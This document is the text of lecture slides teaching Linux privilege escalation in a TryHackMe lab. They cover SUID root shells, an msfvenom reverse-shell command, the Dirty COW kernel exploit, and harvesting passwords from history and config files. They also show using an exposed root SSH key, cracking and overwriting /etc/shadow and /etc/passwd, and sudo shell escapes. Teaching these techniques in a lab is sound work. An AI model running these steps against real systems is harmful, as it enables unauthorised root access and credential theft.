Privilege Escalation

@mmar

Hassan 1
 Linux Privilege Escalation

 This Lecture will focus on privilege escalation techniques in Linux and *nix
systems. You will learn:
 How basic user privileges work in Linux
 Multiple methods for escalating your user’s privileges
 Why and how these methods work
 Tools you can use to identify potential escalation paths

Hassan 2
 Pre-Requisites

 A basic understanding of Linux systems would be desirable, though the lecture will
cover some aspects
 This course assumes that you have a fully working low- privileged shell on a Linux
system, and will not cover obtaining one (this is a post-exploitation lecture)

The “user” account password is: password321 The “root” account password is: password123

https://tryhackme.com/r/room/linprivesc

ssh [email protected] -oHostKeyAlgorithms=+ssh-rsa

Hassan 3
 General Concepts

 Our ultimate goal with privilege escalation in Linux is to gain a shell running as the
root user
 Privilege escalation can be simple (e.g. a kernel exploit) or require a lot of
reconnaissance on the compromised system
 In a lot of cases, privilege escalation may not simply rely on a single
misconfiguration, but may require you to think, and combine multiple
misconfigurations

Hassan 4
 General Concepts

 All privilege escalations are effectively examples of access control violations

 Access control and user permissions are intrinsically linked
 When focusing on privilege escalations in Linux, understanding how Linux handles
permissions is very important

Hassan 5
Understanding
Permissions in
Linux

6
 Users, Groups, and Files & Directories

 At a basic level, permissions in Linux are a relationship between users, groups,

and files & directories
 Users can belong to multiple groups. Groups can have multiple users
 Every file and directory defines its permissions in terms of a user, a group, and
“others” (all other users)

Hassan 7
 Users

 User accounts are configured in the /etc/passwd file. User password hashes are
stored in the /etc/shadow file. Users are identified by an integer user ID (UID)
 The “root” user account is a special type of account in Linux. It has a UID of 0, and
the system grants this user access to every file

Hassan 8
 Groups

 Groups are configured in the /etc/group file

 Users have a primary group, and can have multiple secondary (or supplementary)
groups
 By default, a user’s primary group has the same name as their user account

Hassan 9
 Files & Directories

 All files & directories have a single owner and a group

 Permissions are defined in terms of read, write, and execute operations
 There are three sets of permissions, one for the owner, one for the group, and one
for all “other” users (can also be referred to as “world”)
 Only the owner can change permissions

Hassan 10
 File Permissions

 File permissions are self explanatory:

 Read – when set, the file contents can be read
 Write – when set, the file contents can be modified
 Execute – when set, the file can be executed (i.e. run as some kind of process)

Hassan 11
 Directory Permissions

 Directory permissions are slightly more complicated:

 Execute – when set, the directory can be entered. Without this permission,
neither the read nor write permissions will work
 Read – when set, the directory contents can be listed.
 Write – when set, files and subdirectories can be created in the directory.

Hassan 12
 Special Permissions

 setuid (SUID) bit

 When set, files will get executed with the privileges of the file owner
 setgid (SGID) bit
 When set on a file, the file will get executed with the privileges of the filegroup
 When set on a directory, files created within that directory will inherit the group
of the directory itself

Hassan 13
 Viewing Permissions

 The ls command can be used to view permissions:

 The first 10 characters indicate the permissions set on the file or directory
 The first character simply indicates the type (e.g. '-' for file, 'd' for directory)

$ ls -l /bin/date
-rwxr-xr-x 1 root root 60416 Apr 28 2010 /bin/date

Hassan 14
 Viewing Permissions

 The remaining 9 characters represent the 3 sets of permissions (owner, group,

others)
 Each set contains 3 characters, indicating the read (r), write (w), and execute (x)
permissions
 SUID/SGID permissions are represented by an 's' in the execute position

Hassan 15
 Real, Effective, & Saved UID/GID

 As we already know users are identified by a user ID

 In fact, each user has 3 user IDs in Linux (real, effective, and saved)
 A user’s real ID is who they actually are (the ID defined in /etc/passwd). Ironically,
the real ID is used less often to check a user’s identity

Hassan 16
 Real, Effective, & Saved UID/GID

 A user’s effective ID is normally equal to their real ID, however when executing a
process as another user, the effective ID is set to that user’s real ID
 The effective ID is used in most access control decisions to verify a user, and
commands such as whoami use the effective ID
 Finally, the saved ID is used to ensure that SUID processes can temporarily switch
a user’s effective ID back to their real ID and back again without losing track of the
original effective ID

Hassan 17
 Real, Effective, & Saved UID/GID

 Print real and effective user/group IDs:

Real ID Effective ID
# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root)
groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev
),1000(user)

 Print real, effective, saved, and file system user / group IDs of the current process
(i.e. our shell):

# cat /proc/$$/status | grep "[UG]id"

Uid: 1000 0 0 0
Gid: 1000 0 0 0
Real ID Effective Saved ID
ID

Hassan 18
Spawning
Root Shells

19
 Spawning Root Shells

 Our ultimate goal is to spawn a root shell

 While the end result is the same (executing /bin/sh or /bin/bash), there are multiple
ways of achieving this execution
 In this lecture, we will use a variety of methods. This section highlights a few which
can be used in situations where commands can be executed as root

Hassan 20
 “rootbash” SUID

 One of the easiest ways to spawn a root shell is to create a copy of the /bin/bash
executable file
 Make sure it is owned by the root user, and has the SUID bit set
 A root shell can be spawned by simply executing the rootbash file with the -p
command line option.
 The benefit of this method is it is persistent (once you run the exploit, rootbash can
be used multiple times)

Hassan 21
 Custom Executable

 There may be instances where some root process executes another process
which you can control. In these cases, the following C code, once compiled, will
spawn a Bash shell running as root:
int main() {
setuid(0);
system("/bin/bash -p");
}

 Compile using:
$ gcc -o <name> <filename.c>

Hassan 22
 msfvenom

 Alternatively, if a reverse shell is preferred, msfvenom can be used to generate an

executable (.elf) file:

$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf >

shell.elf

 This reverse shell can be caught using Netcat or Metasploit’s own multi/handler

Hassan 23
 Native Reverse Shells

 There are multiple ways to spawn reverse shells natively on many Linux
distributions
 A good tool for suggesting these is: https://github.com/mthbernardes/rsg
 All can be caught using a simple Netcat listener

Hassan 24
 Privilege
Escalation
Tools
25
 Why use tools?

 Tools allow us to automate the reconnaissance that can identify potential privilege
escalations
 While it is always important to understand what tools are doing, they are
invaluable in a time-limited setting
 The most widely used tools are Linux Smart Enumeration and LinEnum

Hassan 26
 Linux Smart Enumeration

 Linux Smart Enumeration (lse.sh) is recently become a favorite privilege

escalation tools for hackers
 In addition to being a Bash script (which helps if Python isn’t installed), it has
multiple levels which gradually reveal more and more information
 https://github.com/diego-treitos/linux-smart-enumeration

Hassan 27
 LinEnum

 LinEnum is an advanced Bash script which extracts a large amount of useful

information from the target system
 It can copy interesting files for export, and search for files containing a keyword
(e.g. “password”)
 https://github.com/rebootuser/LinEnum

Hassan 28
 Other Tools

 There are also many other useful tools which you can experiment with
 https://github.com/linted/linuxprivchecker
 https://github.com/AlessandroZ/BeRoot
 http://pentestmonkey.net/tools/audit/unix-privesc-check
 https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS

Hassan 29
 Kernel
Exploits

30
 What is a Kernel?

 Kernels are the core of any operating system

 Think of it as a layer between application software and the actual computer
hardware
 The kernel has complete control over the operating system. Exploiting a kernel
vulnerability can result in execution as the root user

Hassan 31
 Finding Kernel Exploits

 Finding and using kernel exploits is usually a simple process:

 Enumerate kernel version (uname -a)
 Find matching exploits (Google, ExploitDB, GitHub)
 Compile and run
 Beware though, as Kernel exploits can often be unstable and may be one-shot or
cause a system crash

Hassan 32
 Finding Kernel Exploits

1. Enumerate the kernel version:

$ uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_6
4 GNU/Linux

2. Use searchsploit to find matching exploits:

# searchsploit linux kernel 2.6.32 priv esc

Note that none of the exploits match the distribution of Linux (Debian)
Hassan 33
 Finding Kernel Exploits

3. We can try and adjust our search to be less specific with the kernel version, but
more specific with the distribution:
# searchsploit linux kernel 2.6 priv esc debian

4. Again, we get a few exploits that we can’t use for various reasons.
Hassan 34
 Finding Kernel Exploits

4. Again, we get a few exploits that we can’t use for various reasons.
5. Install Linux Exploit Suggester 2 https://github.com/jondonas/linux-exploit-
suggester-2 tool against the original kernel version:

This reveals a popular kernel exploit (Dirty COW)

Linux Exploit Suggester 2 can also directly identify potential kernel exploits on the current system
user@debian:~/tools/linux-exploit-suggester$ ./linux-exploit-suggester.sh

Hassan 35
 Finding Kernel Exploits

6. There are a number of Dirty COW exploits, all of which use different methods to
obtain a root shell. The following version seems to work best on the practice VM:
7. Download and compile it using the instructions in the file:

$ gcc -pthread c0w.c -o c0w

Hassan 36
 Finding Kernel Exploits

8. Run the exploit:

$ ./c0w

9. Once the exploit is complete, simply execute the /usr/bin/passwd binary to get a
root shell:
$ /usr/bin/passwd
root@debian:/home/user# id
uid=0(root) gid=1000(user) groups=0(root) ...

it replaces the SUID file /usr/bin/passwd with one that spawns a shell (a backup of /usr/bin/passwd is made at /tmp/bak).

Hassan 37
 Finding Kernel Exploits

10. Remember to restore the original /usr/bin/passwd file and exit the root shell
before continuing
mv /tmp/bak /usr/bin/passwd
exit

Hassan 38
Passwords
& Keys

39
 Passwords

 While it might seem like a long shot, weak password storage and password re-use
can be easy ways to escalate privileges.
 While the root user’s account password is hashed and stored securely in
/etc/shadow, other passwords, such as those for services may be stored in
plaintext in config files
 If the root user re-used their password for a service, that password may be found
and used to switch to the root user

Hassan 40
 History Files

 History files record commands issued by users while they are using certain
programs
 If a user types a password as part of a command, this password may get stored in
a history file
 It is always a good idea to try switching to the root user with a discovered
password

Hassan 41
 History Files

 1. View the contents of hidden files in the user’s home directory with filenames
ending in “history”:
$ cat ~/.*history | less
ls -al
cat .bash_history
ls -al
mysql -h somehost.local -uroot -ppassword123

 It appears that the user connected to a MySQL server as the root user using the
password “password123”.

Hassan 42
 History Files

 2. Use the su command to switch to the root user account, using the password
found in the history file:

$ su root
Password:
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

Hassan 43
 Config Files

 Many services and programs use configuration (config) files to store settings
 If a service needs to authenticate to something, it might store the credentials in a
config file
 If these config files are accessible, and the passwords they store are reused by
privileged users, we may be able to use it to log in as that user

Hassan 44
 Config Files

 List the contents of the user’s home directory:

$ ls
myvpn.ovpn tools

 View the contents of the myvpn.ovpn config file:

$ cat myvpn.ovpn
...
auth-user-pass /etc/openvpn/auth.txt
...

 The auth-user-pass option in OpenVPN allows for the plaintext storage of

credentials in a file (/etc/openvpn/auth.txt)

Hassan 45
 Config Files

 3. View the contents of the /etc/openvpn/auth.txt file:

$ cat /etc/openvpn/auth.txt
root
password123

 4. Use the su command to switch to the root user account, using the password
found in the auth.txt file:

$ su root
Password:
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

Hassan 46
 SSH Keys

 SSH keys can be used instead of passwords to authenticate users using SSH
 SSH keys come in pairs: one private key, and one public key. The private key
should always be kept secret
 If a user has stored their private key insecurely, anyone who can read the key may
be able to log into their account using it.

Hassan 47
 SSH Keys

 1. A hidden directory (.ssh) exists in the system root directory. View the contents
of this directory:
$ ls -l /.ssh
total 4
-rw-r--r-- 1 root root 1679 Aug 19 06:56 root_key

The file root_key is world-readable

 2. View the contents of the root_key file:

$ cat /.ssh/root_key
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3IIf6Wczcdm38MZ9+QADSYq9FfKfwj0mJaUteyJHWHZ3/GNm
...

Hassan 48
 SSH Keys

 3. Copy the root_key file to your local machine and correct its permissions so
SSH will accept it:
$ chmod 600 root_key

 4. Use the key to connect to the SSH server as the root user:
$ ssh -i root_key [email protected] -oHostKeyAlgorithms=+ssh-rsa
...
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root)

host *
# nano ~/.ssh/config, add the lines at the beginning PubkeyAcceptedKeyTypes=+ssh-rsa
HostKeyAlgorithms=+ssh-rsa

Hassan 49
 Weak File
Permissions

50
 Weak File Permissions

 Certain system files can be taken advantage of to perform privilege escalation if

the permissions on them are too weak
 If a system file has confidential information we can read, it may be used to gain
access to the root account
 If a system file can be written to, we may be able to modify the way the operating
system works and gain root access that way

Hassan 51
 Useful Commands

 Find all writable files in /etc:

$ find /etc -maxdepth 1 -writable -type f

 Find all readable files in /etc:

$ find /etc -maxdepth 1 -readable -type f

 Find all directories which can be written to:

$ find / -executable -writable -type d 2> /dev/null

Hassan 52
 Useful Commands

 Find all directories which can be written to:

$ find / -executable -writable -type d 2> /dev/null

Hassan 53
 /etc/shadow

 The /etc/shadow file contains user password hashes, and by default is not
readable by any user except for root
 If we are able to read the contents of the /etc/shadow file, we might be able to
crack the root user’s password hash
 If we are able to modify the /etc/shadow file, we can replace the root user’s
password hash with one we know

Hassan 54
 Readable /etc/shadow

 Check the permissions of the /etc/shadow file

$ ls -l /etc/shadow
-rw-r—rw- 1 root shadow 810 May 13 2017 /etc/shadow

 Note that it is world readable

 Extract the root user’s password hash:

Hassan 55
 Readable /etc/shadow

 Save the password hash in a file on your Kali Machine

 Crack the password using john

 Now you can switch to root user

Hassan 56
 Writable /etc/shadow

 Check the permissions of the /etc/shadow file:

$ ls -l /etc/shadow
-rw-r—rw- 1 root shadow 810 May 13 2017 /etc/shadow

 Note that it is world writable

 Copy / save the contents of /etc/shadow so we can restore it later.

Hassan 57
 Writable /etc/shadow

 Generate a new SHA-512 password hash:

$ mkpasswd -m sha-512 newpassword
$6$DoH8o2GhA$5A7DHvXfkIQO1Zctb834b.SWIim2NBNys9D9h5wUvYK3IOGdxoOlL9VE
WwO/okK3vi1IdVaO9.xt4IQMY4OUj/

 Edit the /etc/shadow and replace the root user’s password hash with the one we
generated

Hassan 58
 Writable /etc/shadow

 Now you can switch to root user

 Revert the original shadow file

Hassan 59
 /etc/passwd

 The /etc/passwd historically contained user password hashes

 For backwards compatibility, if the second field of a user row in /etc/passwd
contains a password hash, it takes precedence over the hash in /etc/shadow
 If we can write to /etc/passwd, we can easily enter a known password hash for the
root user, and then use the su command to switch to the root user
 Alternatively, if we can only append to the file, we can create a new user but
assign them the root user ID (0). This works because Linux allows multiple entries
for the same user ID, as long as the usernames are different

Hassan 60
 /etc/passwd

 The root account in /etc/passwd is usually configured like this:

root:x:0:0:root:/root:/bin/bash

 The “x” in the second field instructs Linux to look for the password hash in the
/etc/shadow file
 In some versions of Linux, it is possible to simply delete the “x”, which Linux
interprets as the user having no password
root::0:0:root:/root:/bin/bash

Hassan 61
 Writable /etc/passwd

 Check the permissions of the /etc/passwd file:

$ ls -l /etc/passwd
-rw-r--rw- 1 root root 951 May 13 2017 /etc/passwd

 Note that it is world-writable

 Generate a password hash for the password “password” using OpenSSL

Hassan 62
 Writable /etc/passwd

 Edit the /etc/passwd file and enter the hash in the second field of the root user
row:

 Now you will be able to login with new password

Hassan 63
 Writable /etc/passwd

 Alternatively, append a new row to /etc/passwd to create an alternate root user

(e.g. newroot):
newroot:L9yLGxncbOROc:0:0:root:/root:/bin/bash

 Use the su command to switch to the newroot user

Hassan 64
 Backups

 Even if a machine has correct permissions on important or sensitive files, a user

may have created insecure backups of these files
 It is always worth exploring the file system looking for readable backup files. Some
common places include user home directories, the / (root) directory, /tmp, and
/var/backups

Hassan 65
 Backups

 Look for interesting files, especially hidden files, in common locations

$ ls -la /home/user
$ ls -la /
$ ls -la /tmp
$ ls -la /var/backups

 Note that a hidden .ssh directory exists in the system root:

Hassan 66
 Backups

 In this directory, we can see a world-readable file called root_key

$ ls -l /.ssh
total 4
-rw-r--r-- 1 root root 1679 Aug 24 18:57 root_key

 Further inspection of this file seems to indicate that this is an SSH private key. The
name and owner of the file suggest this key belongs to the root user
$ head -n 1 /.ssh/root_key
-----BEGIN RSA PRIVATE KEY-----

Hassan 67
 Backups

 Before we try to use this key, let’s confirm that root logins are even allowed via
SSH

 Copy the key over to your local machine, and give it correct permissions
(otherwise SSH will refuse to use it)
# chmod 600 root_key

Hassan 68
 Backups

 Use the key to SSH to the target as the root account

# ssh -i root_key [email protected] -oHostKeyAlgorithms=+ssh-dss

Hassan 69
Sudo

70
 What is sudo?

 sudo is a program which lets users run other programs with the security privileges
of other users. By default, that other user will be root
 A user generally needs to enter their password to use sudo, and they must be
permitted access via rule(s) in the /etc/sudoers file
 Rules can be used to limit users to certain programs and forgo the password entry
requirement

Hassan 71
 Useful Commands

 Run a program using sudo:

$ sudo <program>

 Run a program as a specific user:

$ sudo –u <username> <program>

 List programs a user is allowed (and disallowed) to run:

$ sudo -l

Hassan 72
 Known Password

 By far the most obvious privilege escalation with sudo is to use sudo as it was
intended!
 If your low privileged user account can use sudo unrestricted (i.e. you can run any
programs) and you know the user’s password, privilege escalation is easy, by
using the “switch user” (su) command to spawn a root shell
$ sudo su

Hassan 73
 Other Methods

 If for some reason the su program is not allowed, there are many other ways to
escalate privileges:
$ sudo -s
$ sudo -i
$ sudo /bin/bash
$ sudo passwd

 Even if there are no “obvious” methods for escalating privileges, we may be able
to use a shell escape sequence

Hassan 74
 Shell Escape Sequences

 Even if we are restricted to running certain programs via sudo, it is sometimes

possible to “escape” the program and spawn a shell
 Since the initial program runs with root privileges, so does the spawned shell
 A list of programs with their shell escape sequences can be found here:
https://gtfobins.github.io/

Hassan 75
 Privilege Escalation (Generic)

 List the programs your user is allowed to run via sudo:

$ sudo -l

(root) NOPASSWD: /usr/sbin/iftop

(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk

Hassan 76
 Privilege Escalation (Generic)

 For each program in the list, see if there is a shell escape sequence on GTFOBins
(https://gtfobins.github.io/)
 If an escape sequence exists, run the program via sudo and perform the sequence
to spawn a root shell

Hassan 77
 Privilege Escalation (Generic)

 For each program in the list, see if there is a shell escape sequence on GTFOBins
(https://gtfobins.github.io/)
 If an escape sequence exists, run the program via sudo and perform the sequence
to spawn a root shell

Hassan 78
Privilege Escalation (Generic)

Hassan 79
Privilege Escalation (Generic)

Hassan 80
 Abusing Intended Functionality

 If a program doesn’t have an escape sequence, it may still be possible to use it to

escalate privileges.
 If we can read files owned by root, we may be able to extract useful information
(e.g. passwords, hashes, keys)
 If we can write to files owned by root, we may be able to insert or modify
information

Hassan 81
 Privilege Escalation

 List the programs your user is allowed to run via sudo:

$ sudo -l
...
(root) NOPASSWD: /usr/sbin/apache2

 Note that apache2 is in the list

 Apache2 doesn’t have any known shell escape sequences, however when parsing
a given config file, it will error and print any line it doesn’t understand

Hassan 82
 Privilege Escalation

 Save the password hash in a file (e.g. hash.txt):

$ echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVl
aXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash.txt'

 Crack the password hash using john:

$ john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.t
xt hash.txt
...
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE
2 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (?)

Hassan 83
 Privilege Escalation

 Use the su command to switch to the root user, entering the password we cracked
when prompted:
$ su
Password:
root@debian:/# id
uid=0(root) gid=0(root) groups=0(root)

Hassan 84
 Privilege
Escalation
Strategy
85
 Enumeration

 Check your user (id, whoami)

 Run Linux Smart Enumeration with increasing levels
 Run LinEnum & other scripts as well!
 If your scripts are failing and you don’t know why, you can always run the manual
commands from this course, and other Linux PrivEsc cheatsheets online (e.g.
https://blog.g0tmi1k.com/2011/08/basic- linux-privilege-escalation/

Hassan 86
 Strategy

 Spend some time and read over the results of your enumeration
 If Linux Smart Enumeration level 0 or 1 finds something interesting, make a note
of it
 Avoid rabbit holes by creating a checklist of things you need for the privilege
escalation method to work

Hassan 87
 Strategy

 Have a quick look around for files in your user’s home directory and other common
locations (e.g. /var/backup, /var/logs)
 If your user has a history file, read it, it may have important information like
commands or even passwords.

Hassan 88
 Strategy

 Try things that don’t have many steps first, e.g. Sudo, Cron Jobs, SUID files.
 Have a good look at root processes, enumerate their versions and search for
exploits.
 Check for internal ports that you might be able to forward to your attacking
machine.

Hassan 89
 Strategy

 If you still don’t have root, re-read your full enumeration dumps and highlight
anything that seems odd
 This might be a process or file name you aren’t familiar with, an “unusual”
filesystem configured (on Linux, anything that isn’t ext, swap, or tmpfs), or even a
username
 At this stage you can also start to think about Kernel Exploits

Hassan 90
 Don’t Panic

 Privilege Escalation is tricky. Practice makes perfect

 Keep searching!

Hassan 91
Thanks

Hassan 92